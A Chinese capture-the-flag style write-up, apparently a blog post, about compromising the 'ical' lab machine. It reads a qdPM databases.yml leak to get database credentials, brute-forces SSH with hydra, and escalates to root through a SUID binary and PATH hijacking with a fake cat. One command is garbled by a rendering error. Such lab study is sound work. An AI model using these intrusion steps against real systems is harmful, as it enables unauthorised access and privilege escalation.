【ical】靶场记录

一、信息收集

IP:192.168.236.150
在这里插入图片描述
访问:
在这里插入图片描述
尝试sqlmap,没有信息

查看qdpb 9.2这个框架是否存在已知漏洞

二、端口扫描

发现具有22端口,80端口,3306端口
22端口:ssh连接密码爆破
80端口:页面没发现信息
3306端口:数据库密码爆破
在这里插入图片描述

三、漏洞库查询是否存在框架漏洞

命令:searchsploit qdpm在这里插入图片描述
首先打开第一个文件:
命令:searchsploit -p + 后缀 找到该文件的具体路径
在这里插入图片描述
命令:cat 路径
在这里插入图片描述
翻译:数据库的密码和连接字符串存储在yml文件中。要访问yml文件,可以访问http:///core/config/databases.yml文件并下载。

访问:http:///core/config/databases.yml

http://192.168.236.150/core/config/databases.yml在这里插入图片描述
数据库账号:qdpmadmin 密码:UcVQCMQk2STVeS6J

四、数据库连接

利用Navicat工具连接数据库:
在这里插入图片描述

在这里插入图片描述
查看到账号密码,密码是base64加密后的,汇总后如下:
这里的账号得要小写:
在这里插入图片描述
密码解密后:
在这里插入图片描述
得到了账号和密码,尝试ssh连接

五、SSH 爆破

利用hydra工具:
hydra -L /home/kali/桌面/2.txt -P /home/kali/桌面/3.txt -t 4 -v -e ns 192.168.236.150 ssh
在这里插入图片描述
爆破成功

进行登录:
在这里插入图片描述
在这里插入图片描述

六、提权

先查看是否存在一些敏感文件:
在这里插入图片描述意思就是存在漏洞点,需要自己发现

命令:find / -perm -u=s 2>/dev/null
寻找是否存在可执行root权限的二进制文件
在这里插入图片描述
关注:/opt/get_access
在这里插入图片描述
乱码中还是发现了:cat /root/system.info
在这里插入图片描述
cat可以打开root下的文件,说明cat具有root权限,还没有指定cat位置,可以创建一个cat文件,然后写入到环境变量里,达到提权
命令:
echo “/bin/bash” > /tmp/cat #在tmp下创建cat并写入/bin/bash
chmod 777 cat #对cat赋予执行权限
echo KaTeX parse error: Expected 'EOF', got '#' at position 30: … #̲写入环境变量----expor…PATH
/opt/get_access #执行,拿到root权限

在这里插入图片描述

七、总结

1、利用账号密码连接数据库要会,因为在linux和windows下连接数据库未成功,所以使用了Navicat工具
2、利用hydra进行ssh密码爆破
3、熟练使用msf漏洞库,来查找一些已知漏洞
4、提权,关注所有敏感文件和信息,具有root权限的可执行二进制文件

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值